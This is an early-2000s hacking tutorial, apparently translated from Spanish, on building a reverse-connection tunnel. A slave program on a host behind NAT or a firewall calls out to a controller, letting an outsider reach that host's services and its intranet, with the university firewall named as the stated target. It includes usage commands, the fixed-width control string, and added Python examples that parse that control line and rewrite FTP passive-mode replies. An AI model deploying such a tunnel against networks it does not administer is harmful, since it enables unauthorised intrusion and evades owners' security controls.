HOW TO ACCESS SERVICES ON HOSTS THAT ARE BEHIND PROXIES/NAT/FIREWALLS

E.Sobrino (eid0) 2001
eid0@micro-electronica.com
http://www.micro-electronica.com

Dedicated to Ru69 and his French network (thanks for testing the program).

This text is written for didactic purposes only. The author does not hold himself responsible for any misuse that may be made of this information, nor for the programs included with it.
If your computer catches fire, the whole hard disk gives up or a dog bites you when you run them, don't complain to the author.

The programs, together with the source code related to this article, can be downloaded from:
http://www.micro-electronica.com/download/conexinversas.zip

INTRODUCTION

It is more and more common to come across computers that only have outbound access to the Internet and do not accept incoming connections. This is basically due to two reasons:

1. Lack of an Internet IP (that is, the computer sits behind NAT or a proxy) and it only has a local IP.
2. Firewall rules that block incoming connection packets towards the host.

As you will already have deduced (and many of you verified), these computers can only be used for outbound connections with simple protocols: for example browsing the web, passive FTP (active FTP does not work, as will be discussed later), etc.
This prevents us from running services of any kind, and that is what we are going to try to hack.

OBJECTIVE

Our objective is to create a program that lets us access the services that exist behind these hosts. Practical examples:

Create FTP servers on any university computer, reachable from the Internet, bypassing all of the university's firewalls.

Access all the local computers of the university from the Internet.

That is, we want to reach all the services of these "hidden" hosts from an external computer,
bypassing all the firewall's filters or the side effects of NAT and proxies.
For this we will need:

To run a program on one of the hosts behind the proxy/firewall that lets us reach, from anywhere on the Internet, all of its services (http, ftp, etc.),
as well as all the services of the hosts on its intranet.

As was to be expected, we will also need a program on the client computer from which we want to connect, so that the client programs (ftp, browser, etc.) do not notice the change and do not have to worry about local IPs or anything of the sort.

From now on we will call the computer that has an Internet connection and wants to connect to a computer behind a proxy/firewall the controller. We will call the computer behind the proxy/firewall the slave.

The operating principle is simple: the slave connects to the controller with an outbound connection, which gets past the local firewalls. From that moment on, over this connection the controller sends the slave commands to forward further connections to whichever local ports it wants, from the host and remote port it specifies in the command.

Furthermore, we will implement the programs as client/server, multithreaded and with a persistent connection, so that a single connection serves all kinds of services, with multiple connections and with multiple different slaves.
We will also take care to handle the reconnection of this main connection, since it is the only link that joins us to the slaves.

To begin, we will implement the control program for Linux, and the slave program for Windows 9X/NT/2000 computers, since that is what we will normally find everywhere.

Before getting down to work: to follow this article you will need a very simple and very useful application that has been in use on UNIX systems for a long time and was recently ported to Windows by the extraordinary L0pht group. Download it free from their page.

The Linux server program is named server.c; it consists of a daemon that collects all the connections from the slaves and from the clients, and acts as an intermediary between them.
The Windows client programs are named pilladorftp.c (a totally inappropriate name, since it has nothing to do with FTP) and datapipeinverso.c. The program pilladorftp.c establishes the main connection with the controller and, when it receives a command, invokes datapipeinverso so that it bounces the connection to wherever the controller tells it.
The best way to understand how it works is to look at the example:

EXAMPLE OF OPERATION

The Windows programs must be placed together in the same directory.

Example:
Server: ip = 200.200.200.200

Slave: local ip = 192.168.0.1

Gateway = 201.201.201.201

We are going to access the slave's telnet service from any point on the Internet. To do so:

On Linux:
server 7000 (the program listens on port 7000 for connections from the slaves)

On Windows:
pilladorftp 200.200.200.200 (the Windows machine opens a connection to the server to receive orders)

We now have the main communication channel; now we can get on with accessing services.

On Linux:
nc -l -p 8000 -v

And in another shell:
nc 127.0.0.1 7000
And we type the following:
CONTROL201.201.201.201REDIRECCIONAPUERTO200.200.200.2000800000023127.000.000.001 [ENTER]

Having done this, we will see the slave's telnet service appear in the shell on port 8000, from which we can now access it.

The control string that the controller receives breaks down as follows:

CONTROL(IP-slave-gateway)REDIRECCIONAPUERTO(IP-server)(server port)(local port)(bounce host)

IPs always contain 15 digits (that is, each octet zero-padded to three digits, as in 127.000.000.001) and ports always 5 digits.
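As an added example (not part of the original article or its programs), here is a parser for this fixed-width control line in Python, together with the inverse formatter. The field names (slave_gateway, server_ip, server_port, local_port, bounce_host) are my own; the layout is the one given above. A hub that accepts such lines should validate every field before acting on them, and the same parser can be used to recognise the command in a captured stream.

```python
import re

# Fixed-width layout of the control line described in the article:
# CONTROL <slave-gateway-ip> REDIRECCIONAPUERTO <server-ip> <server-port> <local-port> <bounce-host>
# IPs always occupy 15 characters (three-digit, zero-padded octets), ports always 5 digits.
_PREFIX = "CONTROL"
_COMMAND = "REDIRECCIONAPUERTO"
_IP_LEN, _PORT_LEN = 15, 5
_LINE_LEN = len(_PREFIX) + _IP_LEN + len(_COMMAND) + _IP_LEN + 2 * _PORT_LEN + _IP_LEN  # 80
_IP_RE = re.compile(r"^\d{3}\.\d{3}\.\d{3}\.\d{3}$")


def _unpad_ip(field):
    """Validate a 15-character zero-padded IP field and return it in normal dotted form."""
    if not _IP_RE.match(field):
        raise ValueError(f"bad IP field: {field!r}")
    octets = [int(o) for o in field.split(".")]
    if any(o > 255 for o in octets):
        raise ValueError(f"octet out of range in {field!r}")
    return ".".join(str(o) for o in octets)


def _unpad_port(field):
    """Validate a 5-digit port field and return it as an int in 1..65535."""
    if len(field) != _PORT_LEN or not field.isdigit():
        raise ValueError(f"bad port field: {field!r}")
    port = int(field)
    if not 0 < port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return port


def parse_control(line):
    """Split one control line into its fields; raises ValueError on any malformed part."""
    line = line.strip()
    if len(line) != _LINE_LEN:
        raise ValueError(f"expected {_LINE_LEN} characters, got {len(line)}")
    pos = 0

    def take(n):
        nonlocal pos
        chunk = line[pos:pos + n]
        pos += n
        return chunk

    if take(len(_PREFIX)) != _PREFIX:
        raise ValueError("missing CONTROL prefix")
    slave_gateway = _unpad_ip(take(_IP_LEN))
    if take(len(_COMMAND)) != _COMMAND:
        raise ValueError("unknown command")
    return {
        "command": _COMMAND,
        "slave_gateway": slave_gateway,   # which slave (by its gateway IP) the order is for
        "server_ip": _unpad_ip(take(_IP_LEN)),
        "server_port": _unpad_port(take(_PORT_LEN)),   # port on the hub the slave connects back to
        "local_port": _unpad_port(take(_PORT_LEN)),    # service port on the bounce host
        "bounce_host": _unpad_ip(take(_IP_LEN)),       # host the slave bounces to (127.0.0.1 = itself)
    }


def is_valid_control(line):
    """True if the line parses cleanly, False otherwise (convenient for filtering captured traffic)."""
    try:
        parse_control(line)
        return True
    except ValueError:
        return False


def format_control(slave_gateway, server_ip, server_port, local_port, bounce_host):
    """Inverse of parse_control: zero-pad the fields back into the 80-character line."""
    def pad_ip(ip):
        return ".".join(f"{int(o):03d}" for o in ip.split("."))
    return (f"{_PREFIX}{pad_ip(slave_gateway)}{_COMMAND}{pad_ip(server_ip)}"
            f"{server_port:05d}{local_port:05d}{pad_ip(bounce_host)}")


if __name__ == "__main__":
    # The exact line typed in the article's example.
    example = "CONTROL201.201.201.201REDIRECCIONAPUERTO200.200.200.2000800000023127.000.000.001"
    fields = parse_control(example)
    print(fields)
    assert format_control(fields["slave_gateway"], fields["server_ip"], fields["server_port"],
                          fields["local_port"], fields["bounce_host"]) == example
```

Because every field has a fixed width there is no delimiter to get confused by, but the price is that a line of the wrong length or with an octet above 255 must be rejected outright rather than guessed at; the parser does exactly that.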

SPECIAL SERVER PROTOCOLS (FTP)

There are protocols such as FTP in which network-layer information (addresses and ports) is carried inside the application protocol; this obviously causes problems with firewalls and with the many routers that only deal with IP.
For this type of protocol the control program has to be written specially so that it extracts all the network information from the application data. This can be seen in the source code of the program emuladorftp.c, which I also implemented in order to access FTP services on the slave hosts. This program supports FTP PASV connections by creating new connections...
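To show what "extracting the network information from the application data" means in practice, here is an added Python example (my own, not the article's emuladorftp.c) that parses the 227 "Entering Passive Mode" reply defined in RFC 959, the reply that carries the server's data address and port, and rewrites it so that it advertises a relay's own listener instead. This is the same parsing that an FTP-aware firewall or NAT helper performs, which is exactly why the article says these protocols give problems at such devices. The relay address and port in the sample are constructed values.

```python
import re

# RFC 959 passive-mode reply: "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)"
# where h1..h4 are the IPv4 octets and the data port is p1*256 + p2.
_PASV_RE = re.compile(
    r"227[^(]*\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)"
)


def parse_pasv(reply):
    """Return (host, port) advertised in a 227 reply, or None if it is not a well-formed PASV reply."""
    m = _PASV_RE.search(reply)
    if not m:
        return None
    nums = [int(x) for x in m.groups()]
    if any(n > 255 for n in nums):   # each of the six numbers is a single byte
        return None
    host = ".".join(str(n) for n in nums[:4])
    port = nums[4] * 256 + nums[5]
    return host, port


def build_pasv(host, port):
    """Build a 227 reply advertising host:port in the h1,h2,h3,h4,p1,p2 encoding."""
    h = host.split(".")
    return f"227 Entering Passive Mode ({h[0]},{h[1]},{h[2]},{h[3]},{port // 256},{port % 256}).\r\n"


def rewrite_pasv(reply, relay_host, relay_port):
    """Replace the address the FTP server advertised with the relay's own listener.

    Anything that is not a valid 227 reply is passed through untouched, so ordinary
    replies (230, 150, 226, ...) are never altered.
    """
    if parse_pasv(reply) is None:
        return reply
    return build_pasv(relay_host, relay_port)


if __name__ == "__main__":
    # Constructed sample: an FTP server on the slave's intranet answers PASV with its private
    # address, which is useless to a client on the Internet; the relay substitutes its own.
    server_reply = "227 Entering Passive Mode (192,168,0,1,39,16).\r\n"
    print("server advertised:", parse_pasv(server_reply))        # ('192.168.0.1', 10000)
    print("client receives: ", rewrite_pasv(server_reply, "200.200.200.200", 9001).strip())
```

The relay must of course also open a listener on the port it advertises and bridge it to the original host:port it parsed; the rewrite shown here is the control-channel half of that job, and the part a plain TCP forwarder cannot do because it never looks inside the payload.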

Operation would be as follows:

Example:
Server: ip = 200.200.200.200

Slave: local ip = 192.168.0.1

Gateway = 201.201.201.201

On Linux:
server 7000 (the program listens on port 7000 for connections from the slaves)

On Windows:
pilladorftp 200.200.200.200 (the Windows machine opens a connection to the server to receive orders)

We now have the main communication channel; now we can get on with accessing the FTP service.

emuladorftp 200.200.200.200 9000 201.201.201.201 21

And now, to access the slave's FTP, all we have to do is FTP to: ftp 200.200.200.200 9000
or alternatively
ftp 127.0.0.1 9000

Any FTP client can be used, and any number of sessions....

These programs, together with the source code, can be downloaded from:
http://www.micro-electronica.com/download/conexinversas.zip

Any feedback, changes and constructive contributions, send them to: eid0@micro-electronica.com

SOURCE CODE

Multithreaded multihost hub server, runs on Linux

Slave, runs on Windows
Main slave program, in charge of making the outbound connection.

FTP emulator server for passive connections, runs on Linux
Intranet host scanner, logs all the banners of the ports of the specified hosts CLASSIFIED
If someone ports the hub and the emulator to Windows, you could send it in so that it can be posted here.